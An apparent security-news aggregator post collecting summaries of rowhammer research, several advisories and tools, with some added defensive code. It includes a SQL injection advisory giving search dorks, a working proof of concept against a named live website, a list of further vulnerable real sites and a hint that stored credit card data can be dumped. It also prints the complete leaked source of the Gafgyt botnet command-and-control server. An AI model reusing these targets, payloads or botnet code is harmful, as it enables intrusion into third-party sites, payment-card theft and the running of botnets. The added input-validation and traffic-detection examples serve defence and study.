Channel: BOT24

Exploiting the DRAM rowhammer bug to gain kernel privileges, mitigations & Program for testing for the DRAM "rowhammer" problem

“Rowhammer” is a problem with some recent DRAM devices in which repeatedly accessing a row of memory can cause bit flips in adjacent rows. We tested a selection of laptops and found that a subset of them exhibited the problem. We built two working privilege escalation exploits that use this effect. One exploit uses rowhammer-induced bit flips to gain kernel privileges on x86-64 Linux when run as an unprivileged userland process. When run on a machine vulnerable to the rowhammer problem, the process was able to induce bit flips in page table entries (PTEs). It was able to use this to gain write access to its own page table, and hence gain read-write access to all of physical memory.

We don’t know for sure how many machines are vulnerable to this attack, or how many existing vulnerable machines are fixable. Our exploit uses the x86 CLFLUSH instruction to generate many accesses to the underlying DRAM, but other techniques might work on non-x86 systems too.

We expect our PTE-based exploit could be made to work on other operating systems; it is not inherently Linux-specific. Causing bit flips in PTEs is just one avenue of exploitation; other avenues for exploiting bit flips can be practical too. Our other exploit demonstrates this by escaping from the Native Client sandbox.

more here..........http://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html


read Cisco's "Mitigations Available for the DRAM Row Hammer Vulnerability" here.......http://blogs.cisco.com/security/mitigations-available-for-the-dram-row-hammer-vulnerability


and Program for testing for the DRAM "rowhammer" problem here........https://github.com/google/rowhammer-test
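As an added example (not code from Project Zero or from the google/rowhammer-test program linked above), the core of such a test in C: two addresses are read and then evicted with CLFLUSH so that every subsequent read is served by DRAM rather than the cache, and afterwards the buffer is compared against the fill pattern to find flipped bits. Buffer size, iteration counts and the random choice of address pairs are assumptions for illustration; the real test program maps a much larger region so the pair lands in different rows of the same bank.

```c
/* Added example, not code from Project Zero or from google/rowhammer-test:
 * the core of a CLFLUSH-based hammer loop plus a bit-flip checker.
 * Buffer size, iteration counts and the random choice of address pairs
 * are assumptions made for illustration. */
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Evict the cache line holding p so the next load is served by DRAM. */
static inline void flush_line(volatile uint8_t *p)
{
#if defined(__x86_64__) || defined(__i386__)
    __asm__ volatile("clflush (%0)" : : "r"(p) : "memory");
#else
    (void)p; /* no CLFLUSH here: the loop degrades to cached reads and cannot hammer */
#endif
}

/* One hammer pass: load two addresses, flush both, repeat.  The volatile
 * loads keep the compiler from hoisting the reads out of the loop. */
void hammer_pair(volatile uint8_t *a, volatile uint8_t *b, unsigned long iters)
{
    while (iters--) {
        uint8_t x = *a;
        uint8_t y = *b;
        (void)x;
        (void)y;
        flush_line(a);
        flush_line(b);
    }
}

/* Count the bits in buf that no longer match the fill pattern. */
size_t count_flipped_bits(const uint8_t *buf, size_t len, uint8_t pattern)
{
    size_t flips = 0;
    for (size_t i = 0; i < len; i++)
        for (unsigned diff = buf[i] ^ pattern; diff; diff &= diff - 1)
            flips++;
    return flips;
}

/* Fill a buffer with 0xFF, hammer `rounds` random address pairs and report
 * how many bits changed.  The real test uses a mapping of hundreds of MB so
 * the pair lands in distinct rows of the same bank; malloc is used here so
 * the example runs anywhere.  Returns (size_t)-1 if allocation fails. */
size_t hammer_test(size_t len, unsigned rounds, unsigned long iters_per_round)
{
    uint8_t *buf = malloc(len);
    if (buf == NULL)
        return (size_t)-1;
    memset(buf, 0xFF, len);
    srand(1); /* fixed seed: the pair choice is reproducible */
    for (unsigned r = 0; r < rounds; r++) {
        size_t off1 = (size_t)rand() % len;
        size_t off2 = (size_t)rand() % len;
        hammer_pair(buf + off1, buf + off2, iters_per_round);
    }
    size_t flips = count_flipped_bits(buf, len, 0xFF);
    free(buf);
    return flips;
}

/* Self-check of the detector on a constructed buffer with three bits
 * deliberately flipped. */
size_t flip_check_selftest(void)
{
    uint8_t sample[16];
    memset(sample, 0xFF, sizeof sample);
    sample[3] ^= 0x10;   /* one bit */
    sample[9] ^= 0x03;   /* two bits */
    return count_flipped_bits(sample, sizeof sample, 0xFF);
}
```

On a vulnerable machine the interesting part is not the loop but the address selection: the two addresses must be in different rows of the same bank, which is why the real test uses a large populated mapping and many millions of iterations per pair. A few thousand iterations on a small heap buffer, as in the self-test above, are not expected to flip anything.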



PowerShell-AD-Recon by PyroTek3

Found a couple of fun PowerShell enumeration scripts

more here.........http://carnal0wnage.attackresearch.com/2015/03/powershell-ad-recon-by-pyrotek3.html

Kali Linux on a Raspberry Pi (A/B+/2) with LUKS Disk

With the advent of smaller, faster ARM hardware such as the new Raspberry Pi 2 (which now has a Kali image built for it), we’ve been seeing more and more use of these small devices as “throw-away hackboxes”. While this might be a new and novel technology, there’s one major drawback to this concept – and that is the confidentiality of the data stored on the device itself. Most of the setups we’ve seen do little to protect the sensitive information saved on the SD cards of these little computers. This fact, together with a nudge from friends is what prompted us to create a LUKS encrypted, NUKE capable Kali Linux image for our Raspberry Pi devices. The following blog post describes the process, so you can repeat it and make your own shiny shiny.

more here.......https://www.offensive-security.com/kali-linux/raspberry-pi-luks-disk-encryption/

Paper: Glider: A GPU Library Driver for Improved System Security

Legacy device drivers implement both device resource management and isolation. This results in a large code base with a wide high-level interface making the driver vulnerable to security attacks. This is particularly problematic for increasingly popular accelerators like GPUs that have large, complex drivers. We solve this problem with library drivers, a new driver architecture. A library driver implements resource management as an untrusted library in the application process address space, and implements isolation as a kernel module that is smaller and has a narrower lower-level interface (i.e., closer to hardware) than a legacy driver. We articulate a set of device and platform hardware properties that are required to retrofit a legacy driver into a library driver. To demonstrate the feasibility and superiority of library drivers, we present Glider, a library driver implementation for two GPUs of popular brands, Radeon and Intel. Glider reduces the TCB size and attack surface by about 35% and 84% respectively for a Radeon HD 6450 GPU and by about 38% and 90% respectively for an Intel Ivy Bridge GPU. Moreover, it incurs no performance cost. Indeed, Glider outperforms a legacy driver for applications requiring intensive interactions with the device driver, such as applications using the OpenGL immediate mode API.


more here.......http://arxiv.org/pdf/1411.3777.pdf

How to keep your connected home safe: 7 steps you can take to boost home security

The Internet of Things is based on sensors and controls in all sorts of devices. When those types of devices are used to create a smart home, they can give residents unprecedented control and insight. The proliferation of smart devices, however, also opens the door to new dangers and threats.

more here........http://www.macworld.com/article/2894258/how-to-keep-your-connected-home-safe-7-steps-you-can-take-to-boost-home-security.html

Instant v2.0 CMS SQL Injection Vulnerability

==========================================================================================
Instant v2.0 SQL Injection Vulnerability
==========================================================================================

:-------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Instant v2.0 SQL Injection Vulnerability
: # Date : 10th March 2015
: # Author : X-Cisadane
: # CMS Name : Instant v2.0 (another OverCoffee production)
: # CMS Developer : overcoffee.com
: # Version : 2.0
: # Category : Web Applications
: # Vulnerability : SQL Injection
: # Tested On : Google Chrome Version 40.0.2214.115 m (Windows 7), Havij 1.16 Pro & SQLMap 1.0-dev-nongit-20150125
: # Greetz to : Explore Crew, CodeNesia, Bogor Hackers Community, Ngobas and Winda Utari
:-------------------------------------------------------------------------------------------------------------------------:

A SQL injection vulnerability has been discovered in the Instant v2.0 CMS.
The vulnerability is located in the subid parameter of the product_cat.php
file. Attackers are able to execute their own SQL commands by sending a
GET request with a manipulated subid value, and can use this to read
information from the database.

DORKS (How to find the target) :
================================
"Powered By Instant" inurl:/catalog/
inurl:/product_cat.php?subid=
Or use your own Google Dorks :)

Proof of Concept
================

SQL Injection
PoC :
http://[Site]/[Path]/product_cat.php?subid=['SQLi]
The CMS links to this page in the path-style form
http://[Site]/[Path]/product_cat.php/subid=[id]/index.html, so rewrite the
URL into the query-string form above before injecting.

Example :
http://www.cynthiawebbdesigns.com/catalog/product_cat.php/subid=16617/index.html?PHPSESSID=3ef7e156add41316201ffe87bd489a7d

Just change the URL structure to
http://www.cynthiawebbdesigns.com/catalog/product_cat.php?subid='16617
And you'll see this error notice : You have an error in your SQL syntax;
check the manual that corresponds to your MySQL ...

Note : this CMS stores credit card details in the database; they are in the
orders table, which can be dumped with the usual tools.
PIC / PoC : http://i59.tinypic.com/4l0poh.png

Another Vuln Sites :
http://www.unitymarketingonline.com/catalog/product_cat.php?subid=['SQLi]
http://www.peacefulinspirations.net/catalog/product_cat.php?subid=['SQLi]
http://www.dickensgifts.com/catalog/product_cat.php?subid=['SQLi]
http://www.frogandprincellc.com/catalog/product_cat.php?subid=['SQLi]
http://www.debrekht.com/catalog/product_cat.php?subid=['SQLi]
... etc ...
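The root cause the advisory describes, as an added example (not code from the advisory or from the Instant CMS): a query built by splicing the raw subid parameter into the SQL text, next to the input check that stops it. subid is a numeric identifier, so the narrowest fix is to accept it only when the whole string is a decimal integer; note that an atoi()/intval()-style partial parse would turn "16617 UNION SELECT ..." into 16617, which also blocks the injection but silently accepts tampered input, whereas the strict parse rejects it. Table and column names are assumptions; the CMS's real schema is not on the page.

```c
/* Added example, not code from the advisory or from the Instant CMS: the
 * vulnerable query-building pattern next to the check that stops it.
 * Table and column names are assumptions for illustration; the CMS's real
 * schema is not on the page. */
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Vulnerable pattern: the raw GET parameter is spliced into the SQL text,
 * so subid='16617 produces exactly the syntax error the advisory shows.
 * Returns a malloc'ed query string; the caller frees it. */
char *build_query_unsafe(const char *subid)
{
    const char *fmt = "SELECT * FROM products WHERE subid=%s";
    size_t n = strlen(fmt) + strlen(subid) + 1;
    char *q = malloc(n);
    if (q != NULL)
        snprintf(q, n, fmt, subid);
    return q;
}

/* Hardened: accept subid only when the entire string is a non-negative
 * decimal integer.  The check insists that strtol consumed every character,
 * so a trailing " UNION SELECT ..." or a leading quote is rejected outright
 * rather than reinterpreted.  Returns 1 and stores the value on success,
 * 0 otherwise; out may be NULL. */
int parse_subid_strict(const char *subid, long *out)
{
    if (subid == NULL || !isdigit((unsigned char)subid[0]))
        return 0; /* also rejects leading whitespace and a sign, which strtol would skip */
    char *end;
    errno = 0;
    long v = strtol(subid, &end, 10);
    if (errno == ERANGE || *end != '\0')
        return 0;
    if (out != NULL)
        *out = v;
    return 1;
}

/* Hardened query builder: only ever formats a validated integer.
 * Returns 1 and fills buf on success, 0 if subid was rejected. */
int build_query_safe(const char *subid, char *buf, size_t buflen)
{
    long id;
    if (!parse_subid_strict(subid, &id))
        return 0;
    snprintf(buf, buflen, "SELECT * FROM products WHERE subid=%ld", id);
    return 1;
}
```

In the PHP the CMS is written in, the equivalent is to bind subid as an integer parameter of a prepared statement (mysqli or PDO) rather than to interpolate it; the strict integer check above is the input-validation half of that fix and is worth keeping even with prepared statements, since it turns tampering into a logged 400 instead of an empty result set.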

ELF Gafgyt Trojan server source code leak

Gafgyt server source code leaked; reference link here......http://pastebin.com/vdWW47uk
and sample https://www.virustotal.com/sv/file/2a04c216fce75d19e5162081eb747b8a77c205f6dd933b0864c08fb086c929c5/analysis/1425921008/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>     // bzero()
#include <ctype.h>       // isspace(), used by trim()
#include <stdint.h>      // uint32_t, intptr_t
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>  // struct sockaddr_in, INADDR_ANY
#include <netdb.h>
#include <unistd.h>
#include <time.h>
#include <fcntl.h>
#include <sys/epoll.h>
#include <errno.h>
#include <pthread.h>
#include <signal.h>

// This is what you will connect to through telnet.
// This port is different from the bot port, which is set when you run the server.
// This is the management and command interface.
#define MY_MGM_PASS "Cxy0123"
#define MY_MGM_PORT 420

#define MAXFDS 1000000 // No way we actually reach this amount. Ever.

struct clientdata_t {
        uint32_t ip;
        char build[7];
        char connected;
} clients[MAXFDS];
struct telnetdata_t {
        int connected;
} managements[MAXFDS];
static volatile FILE *fileFD;
static volatile int epollFD = 0;
static volatile int listenFD = 0;
static volatile int managesConnected = 0;
int fdgets(unsigned char *buffer, int bufferSize, int fd)
{
        // Read one byte at a time until a newline arrives, the buffer is full, or read() stops returning data.
        // The leaked version tested buffer[total - 1] before any byte had been read (an out-of-bounds read at total == 0).
        int total = 0, got = 1;
        while(got == 1 && total < bufferSize && (total == 0 || *(buffer + total - 1) != '\n')) { got = read(fd, buffer + total, 1); total++; }
        return got;
}
void trim(char *str) // Remove whitespace from a string and properly null-terminate it.
{
    int i;
    int begin = 0;
    int end = strlen(str) - 1;
    while (isspace(str[begin])) begin++;
    while ((end >= begin) && isspace(str[end])) end--;
    for (i = begin; i <= end; i++) str[i - begin] = str[i];
    str[i - begin] = '\0';
}


static int make_socket_non_blocking (int sfd)
{ // man fcntl
        int flags, s;
        flags = fcntl (sfd, F_GETFL, 0);
        if (flags == -1)
        {
                perror ("fcntl");
                return -1;
        }
        flags |= O_NONBLOCK;
        /*
              F_SETFL (int)
              Set  the  file  status  flags  to  the  value specified by arg.  File access mode (O_RDONLY, O_WRONLY, O_RDWR) and file creation flags (i.e., O_CREAT, O_EXCL, O_NOCTTY, O_TRUNC) in arg are
              ignored.  On Linux this command can change only the O_APPEND, O_ASYNC, O_DIRECT, O_NOATIME, and O_NONBLOCK flags.
        */
        s = fcntl (sfd, F_SETFL, flags);
        if (s == -1)
        {
                perror ("fcntl");
                return -1;
        }
        return 0;
}


static int create_and_bind (char *port)
{
        struct addrinfo hints;
        struct addrinfo *result, *rp;
        int s, sfd;
        memset (&hints, 0, sizeof (struct addrinfo));
        hints.ai_family = AF_UNSPEC;     /* Return IPv4 and IPv6 choices */
        hints.ai_socktype = SOCK_STREAM; /* We want a TCP socket */
        hints.ai_flags = AI_PASSIVE;     /* All interfaces */
        s = getaddrinfo (NULL, port, &hints, &result);
        if (s != 0)
        {
                fprintf (stderr, "getaddrinfo: %s\n", gai_strerror (s));
                return -1;
        }
        for (rp = result; rp != NULL; rp = rp->ai_next)
        {
                sfd = socket (rp->ai_family, rp->ai_socktype, rp->ai_protocol);
                if (sfd == -1) continue;
                int yes = 1;
                if ( setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1 ) perror("setsockopt");
                s = bind (sfd, rp->ai_addr, rp->ai_addrlen);
                if (s == 0)
                {
                        break;
                }
                close (sfd);
        }
        if (rp == NULL)
        {
                fprintf (stderr, "Could not bind\n");
                return -1;
        }
        freeaddrinfo (result);
        return sfd;
}
void broadcast(char *msg, int us) // sends message to all bots, notifies the management clients of this happening
{
        int sendMGM = 1;
        if(strcmp(msg, "PING") == 0) sendMGM = 0; // Don't send pings to management. Why? Because a human is going to ignore it.
        char *wot = malloc(strlen(msg) + 10);
        memset(wot, 0, strlen(msg) + 10);
        strcpy(wot, msg);
        trim(wot);
        time_t rawtime;
        struct tm * timeinfo;
        time(&rawtime);
        timeinfo = localtime(&rawtime);
        char *timestamp = asctime(timeinfo);
        trim(timestamp);
        int i;
        for(i = 0; i < MAXFDS; i++)
        {
                if(i == us || (!clients[i].connected &&  (sendMGM == 0 || !managements[i].connected))) continue;
                if(sendMGM && managements[i].connected)
                {
                        send(i, "\x1b[33m", 5, MSG_NOSIGNAL);
                        send(i, timestamp, strlen(timestamp), MSG_NOSIGNAL);
                        send(i, ": ", 2, MSG_NOSIGNAL);
                } //just a prompt with a timestamp.
                printf("sent to fd: %d\n", i); // debug info, possibly also intrusion detection. Tells you when a management client connected on command line.
                send(i, msg, strlen(msg), MSG_NOSIGNAL);
                if(sendMGM && managements[i].connected) send(i, "\r\n\x1b[31m> \x1b[0m", 13, MSG_NOSIGNAL); // send a cool looking prompt to a manager/admin
                else send(i, "\n", 1, MSG_NOSIGNAL);
        }
        free(wot);
}

void *epollEventLoop(void *useless) // the big loop used to control each bot asynchronously. Many threads of this get spawned.
{
        struct epoll_event event;
        struct epoll_event *events;
        int s;
        events = calloc (MAXFDS, sizeof event);
        while (1)
        {
                int n, i;
                n = epoll_wait (epollFD, events, MAXFDS, -1);
                for (i = 0; i < n; i++)
                {
                        if ((events[i].events & EPOLLERR) || (events[i].events & EPOLLHUP) || (!(events[i].events & EPOLLIN)))
                        {
                                clients[events[i].data.fd].connected = 0;
                                close(events[i].data.fd);
                                continue;
                        }
                        else if (listenFD == events[i].data.fd)
                        {
                                while (1)
                                {
                                        struct sockaddr in_addr;
                                        socklen_t in_len;
                                        int infd, ipIndex;

                                        in_len = sizeof in_addr;
                                        infd = accept (listenFD, &in_addr, &in_len); // accept a connection from a bot.
                                        if (infd == -1)
                                        {
                                                if ((errno == EAGAIN) || (errno == EWOULDBLOCK)) break;
                                                else
                                                {
                                                        perror ("accept");
                                                        break;
                                                }
                                        }

                                        clients[infd].ip = ((struct sockaddr_in *)&in_addr)->sin_addr.s_addr;

                                        int dup = 0;
                                        for(ipIndex = 0; ipIndex < MAXFDS; ipIndex++) // check for duplicate clients by seeing if any have the same IP as the one connecting
                                        {
                                                if(!clients[ipIndex].connected || ipIndex == infd) continue;

                                                if(clients[ipIndex].ip == clients[infd].ip)
                                                {
                                                        dup = 1;
                                                        break;
                                                }
                                        }

                                        if(dup)
                                        {
                                                printf("Duplicate Client\n"); // warns the operator on command line
                                                if(send(infd, "!* LOLNOGTFO\n", 13, MSG_NOSIGNAL) == -1) { close(infd); continue; } // orders all the bots to immediately kill themselves if we see a duplicate client! MAXIMUM PARANOIA
                                                if(send(infd, "DUP\n", 4, MSG_NOSIGNAL) == -1) { close(infd); continue; } // same thing as above.
                                                close(infd);
                                                continue;
                                        }

                                        s = make_socket_non_blocking (infd);
                                        if (s == -1) { close(infd); break; }

                                        event.data.fd = infd;
                                        event.events = EPOLLIN | EPOLLET;
                                        s = epoll_ctl (epollFD, EPOLL_CTL_ADD, infd, &event);
                                        if (s == -1)
                                        {
                                                perror ("epoll_ctl");
                                                close(infd);
                                                break;
                                        }

                                        clients[infd].connected = 1;
                                        //send(infd, "!* SCANNER ON\n", 14, MSG_NOSIGNAL);
                                }
                                continue;
                        }
                        else
                        {
                                int thefd = events[i].data.fd;
                                struct clientdata_t *client = &(clients[thefd]);
                                int done = 0;
                                client->connected = 1;
                                while (1)
                                {
                                        ssize_t count;
                                        char buf[2048];
                                        memset(buf, 0, sizeof buf);

                                        while(memset(buf, 0, sizeof buf) && (count = fdgets(buf, sizeof buf, thefd)) > 0)
                                        {
                                                if(strstr(buf, "\n") == NULL) { done = 1; break; }
                                                trim(buf);
                                                if(strcmp(buf, "PING") == 0) // basic IRC-like ping/pong challenge/response to see if server is alive
                                                {
                                                        if(send(thefd, "PONG\n", 5, MSG_NOSIGNAL) == -1) { done = 1; break; } // response
                                                        continue;
                                                }
                                                if(strstr(buf, "BUILD ") == buf)
                                                {
                                                        char *build = strstr(buf, "BUILD ") + 6;
                                                        if(strlen(build) > 9) { printf("build bigger then 6\n"); done = 1; break; }
                                                        memset(client->build, 0, 7);
                                                        strcpy(client->build, build);
                                                        continue;
                                                }
                                                if(strstr(buf, "REPORT ") == buf) // received a report of a vulnerable system from a scan
                                                {
                                                        char *line = strstr(buf, "REPORT ") + 7;
                                                        fprintf(fileFD, "%s\n", line); // let's write it out to disk without checking what it is!
                                                        fflush(fileFD);
                                                        //TODO: automatically exploit that particular IP after scanning for dir and uploading correct arch stuffs.
                                                        continue;
                                                }
                                                if(strcmp(buf, "PONG") == 0)
                                                {
                                                        //should really add some checking or something but meh
                                                        continue;
                                                }

                                                printf("buf: \"%s\"\n", buf);
                                        }

                                        if (count == -1)
                                        {
                                                if (errno != EAGAIN)
                                                {
                                                        done = 1;
                                                }
                                                break;
                                        }
                                        else if (count == 0)
                                        {
                                                done = 1;
                                                break;
                                        }
                                }

                                if (done)
                                {
                                        client->connected = 0;
                                        close(thefd);
                                }
                        }
                }
        }
}

unsigned int clientsConnected() // counts the number of bots connected by looping over every possible file descriptor and checking if it's connected or not
{
        int i = 0, total = 0;
        for(i = 0; i < MAXFDS; i++)
        {
                if(!clients[i].connected) continue;
                total++;
        }

        return total;
}

void *titleWriter(void *sock) // just an informational banner
{
        // this LOOKS vulnerable, but it's actually not.
        // there's no way we can have 2000 digits' worth of clients/bots connected to overflow that char array
        int thefd = (int)(intptr_t)sock;
        char string[2048];
        while(1)
        {
                memset(string, 0, 2048);
                sprintf(string, "%c]0;Hoes connected: %d | Pimps connected: %d%c", '\033', clientsConnected(), managesConnected, '\007');
                // \007 is a bell character... causes a beep. Why is there a beep here?
                if(send(thefd, string, strlen(string), MSG_NOSIGNAL) == -1) return NULL;

                sleep(2);
        }
}


void *telnetWorker(void *sock)
{
        int thefd = (int)(intptr_t)sock;
        managesConnected++;
        pthread_t title;
        char buf[2048];
        memset(buf, 0, sizeof buf);

        if(send(thefd, "Password: ", 10, MSG_NOSIGNAL) == -1) goto end; /* failed to send... kill connection  */
        if(fdgets(buf, sizeof buf, thefd) < 1) goto end; /* no data, kill connection */
        trim(buf);
        if(strcmp(buf, MY_MGM_PASS) != 0) goto end; /* bad pass, kill connection */
        memset(buf, 0, 2048);
        if(send(thefd, "\033[1A", 4, MSG_NOSIGNAL) == -1) goto end;
        pthread_create(&title, NULL, &titleWriter, sock); /* writes the informational banner to the admin after a login */
        if(send(thefd, "\x1b[31m*****************************************\r\n", 48, MSG_NOSIGNAL) == -1) goto end;
        if(send(thefd, "*        WELCOME TO THE BALL PIT        *\r\n", 43, MSG_NOSIGNAL) == -1) goto end;
        if(send(thefd, "*     Now with \x1b[32mrefrigerator\x1b[31m support     *\r\n", 53, MSG_NOSIGNAL) == -1) goto end;
        if(send(thefd, "*****************************************\r\n\r\n> \x1b[0m", 51, MSG_NOSIGNAL) == -1) goto end;
        /* If we can't send the useless banner, kill ourselves! Amazing error handling! */
        managements[thefd].connected = 1;

        while(fdgets(buf, sizeof buf, thefd) > 0)
        {
                trim(buf);
                if(send(thefd, "\x1b[31m> \x1b[0m", 11, MSG_NOSIGNAL) == -1) goto end;
                if(strlen(buf) == 0) continue;
                printf("Management: \"%s\"\n", buf);
                broadcast(buf, thefd); // take a command, send it to the bots
                memset(buf, 0, 2048);
        }

        end:    // cleanup dead socket
                managements[thefd].connected = 0;
                close(thefd);
                managesConnected--;
                return NULL;
}

void *telnetListener(void *useless)
{
        int sockfd, newsockfd;
        socklen_t clilen;
        struct sockaddr_in serv_addr, cli_addr;
        sockfd = socket(AF_INET, SOCK_STREAM, 0);
        if (sockfd < 0) perror("ERROR opening socket");
        bzero((char *) &serv_addr, sizeof(serv_addr));
        serv_addr.sin_family = AF_INET;
        serv_addr.sin_addr.s_addr = INADDR_ANY;
        serv_addr.sin_port = htons(MY_MGM_PORT);
        if (bind(sockfd, (struct sockaddr *) &serv_addr,  sizeof(serv_addr)) < 0) perror("ERROR on binding");
        listen(sockfd,5);
        clilen = sizeof(cli_addr);
        while(1)
        {
                newsockfd = accept(sockfd, (struct sockaddr *) &cli_addr, &clilen);
                if (newsockfd < 0) perror("ERROR on accept");
                pthread_t thread;
                pthread_create( &thread, NULL, &telnetWorker, (void *)newsockfd);
        }
}

int main (int argc, char *argv[])
{
        signal(SIGPIPE, SIG_IGN); // ignore broken pipe errors sent from kernel

        int s, threads;
        struct epoll_event event;

        if (argc != 3)
        {
                fprintf (stderr, "Usage: %s [port] [threads]\n", argv[0]);
                exit (EXIT_FAILURE);
        }
        fileFD = fopen("output.txt", "a+"); // TOCTOU vuln if we have access to CnC
        threads = atoi(argv[2]);

        listenFD = create_and_bind (argv[1]); // try to create a listening socket, die if we can't
        if (listenFD == -1) abort ();

        s = make_socket_non_blocking (listenFD); // try to make it nonblocking, die if we can't
        if (s == -1) abort ();

        s = listen (listenFD, SOMAXCONN); // listen with a huuuuge backlog, die if we can't
        if (s == -1)
        {
                perror ("listen");
                abort ();
        }

        epollFD = epoll_create1 (0); // make an epoll listener, die if we can't
        if (epollFD == -1)
        {
                perror ("epoll_create");
                abort ();
        }

        event.data.fd = listenFD;
        event.events = EPOLLIN | EPOLLET;
        s = epoll_ctl (epollFD, EPOLL_CTL_ADD, listenFD, &event);
        if (s == -1)
        {
                perror ("epoll_ctl");
                abort ();
        }

        pthread_t thread[threads + 2];
        while(threads--)
        {
                pthread_create( &thread[threads + 1], NULL, &epollEventLoop, (void *) NULL); // make a thread to command each bot individually
        }

        pthread_create(&thread[0], NULL, &telnetListener, (void *)NULL);

        while(1)
        {
                broadcast("PING", -1); // ping bots every 60 sec on the main thread

                sleep(60);
        }

        close (listenFD);

        return EXIT_SUCCESS;
}
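The protocol the leaked server speaks is entirely literal: bots announce themselves with "BUILD <arch>" and "REPORT <host>" lines, keepalives are bare "PING"/"PONG", commands broadcast from the telnet console start with "!* ", duplicate clients get "!* LOLNOGTFO" followed by "DUP", and operators see the "WELCOME TO THE BALL PIT" banner and the "Hoes connected:" title string. As an added example (not part of the leak), a classifier in C that runs those tokens over a reassembled TCP payload and separates the weak signal (keepalives) from the strong ones. The flag names and the verdict rule are assumptions for illustration.

```c
/* Added example, not part of the leaked source: classify a reassembled TCP
 * payload by the literal tokens the server above exchanges with bots and
 * operators.  The flag names and the "keepalive-only is not enough"
 * verdict rule are assumptions for illustration. */
#include <stddef.h>
#include <string.h>

enum {
    GAFGYT_BOT_CHECKIN = 1 << 0, /* "BUILD xxx" / "REPORT ..." lines a bot sends after connecting */
    GAFGYT_SERVER_CMD  = 1 << 1, /* "!* ..." command lines broadcast from the C&C */
    GAFGYT_DUP_KICK    = 1 << 2, /* "!* LOLNOGTFO" sent to a duplicate client */
    GAFGYT_MGMT_BANNER = 1 << 3, /* telnet management banner or title string */
    GAFGYT_KEEPALIVE   = 1 << 4, /* bare PING/PONG lines; too generic on their own */
};

static int line_is(const char *line, size_t n, const char *lit)
{
    size_t l = strlen(lit);
    return n == l && memcmp(line, lit, l) == 0;
}

static int line_starts(const char *line, size_t n, const char *lit)
{
    size_t l = strlen(lit);
    return n >= l && memcmp(line, lit, l) == 0;
}

/* Substring search that tolerates escape bytes and NULs in the payload. */
static int payload_contains(const char *hay, size_t n, const char *needle)
{
    size_t l = strlen(needle);
    for (size_t i = 0; l <= n && i + l <= n; i++)
        if (memcmp(hay + i, needle, l) == 0)
            return 1;
    return 0;
}

/* Returns a bitmask of GAFGYT_* flags found in the payload. */
unsigned gafgyt_classify(const char *payload, size_t len)
{
    unsigned flags = 0;
    size_t pos = 0;
    while (pos < len) {
        const char *line = payload + pos;
        const char *nl = memchr(line, '\n', len - pos);
        size_t n = nl ? (size_t)(nl - line) : len - pos;
        pos += n + 1;
        /* the server trim()s every line, so ignore trailing CR and spaces */
        while (n > 0 && (line[n - 1] == '\r' || line[n - 1] == ' '))
            n--;
        if (line_starts(line, n, "BUILD ") || line_starts(line, n, "REPORT "))
            flags |= GAFGYT_BOT_CHECKIN;
        if (line_starts(line, n, "!* "))
            flags |= GAFGYT_SERVER_CMD;
        if (line_is(line, n, "!* LOLNOGTFO"))
            flags |= GAFGYT_DUP_KICK;
        if (line_is(line, n, "PING") || line_is(line, n, "PONG"))
            flags |= GAFGYT_KEEPALIVE;
    }
    if (payload_contains(payload, len, "WELCOME TO THE BALL PIT") ||
        payload_contains(payload, len, "Hoes connected: "))
        flags |= GAFGYT_MGMT_BANNER;
    return flags;
}

/* Verdict: anything beyond bare keepalives is treated as C&C traffic. */
int gafgyt_is_c2(unsigned flags)
{
    return (flags & ~(unsigned)GAFGYT_KEEPALIVE) != 0;
}
```

Like any literal-token signature this is trivially defeated by a recompiled variant that renames its commands, so it belongs in a detection stack next to behavioural indicators (a long-lived TCP session on an odd port that exchanges single short lines every 60 seconds, which is what the main loop above produces) rather than on its own.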

Bootkit Disk Forensics - Part 3

XP is a little more complicated than newer systems due to the use of a single driver for both port and miniport; however, getting the original pointers is fairly straightforward depending on how you do it.

more here........http://www.malwaretech.com/2015/03/bootkit-disk-forensics-part-3.html

Security Advisory: MainWP-Child WordPress Plugin

During a routine audit of our Website Firewall (WAF), we found a critical vulnerability affecting the popular MainWP Child WordPress plugin. According to wordpress.org, it is installed on more than 90,000 WordPress sites as a remote administration tool. We contacted the MainWP team last week and they patched the vulnerability in version 2.0.9.2 last Friday.

more here.......http://blog.sucuri.net/2015/03/security-advisory-mainwp-child-wordpress-plugin.html

Multiple Vulnerabilities in MailEnable

NCC Group
 https://www.nccgroup.com/research/
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Vulnerability Summary
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Title:            Multiple Vulnerabilities in MailEnable
Release Date:     10 March 2015
Reference:        NCC00777, NCC00778, NCC00779, NCC00780
Discoverer:       Soroush Dalili (@irsdl)
Vendor:           MailEnable
Vendor Reference: http://www.mailenable.com/
Systems Affected: Tested on version 8.56 (versions prior to 8.60, 7.60, 6.88, and 5.62 should be vulnerable)
CVE Reference:    TBC
Risk:             High
Status:           Fixed
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Resolution Timeline
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Discovered: 29 December 2014
Reported:   03 February 2015
Fixed:      26 February 2015
Published:  10 March 2015
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Vulnerability Brief Description
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
The following vulnerabilities were identified in the MailEnable application:
1) Directory Traversal
2) Privilege Escalation
3) Stored XSS
4) XXE
